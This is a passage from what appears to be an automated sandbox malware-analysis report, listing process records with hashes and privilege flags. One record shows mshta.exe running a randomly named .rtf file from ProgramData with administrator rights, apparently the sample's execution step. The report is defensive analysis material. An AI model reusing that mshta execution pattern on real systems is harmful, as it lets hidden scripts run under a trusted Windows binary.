                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:12:47:21
                                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:12:47:22
                                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                                          Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:mshta C:\ProgramData\vULADISfrveNTj.rtf
                                                                                                                                                                                          Imagebase:0x7ff7fcdb0000
                                                                                                                                                                                          File size:14848 bytes
                                                                                                                                                                                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                          Disassembly

                                                                                                                                                                                          Code Analysis

                                                                                                                                                                                          Reset < >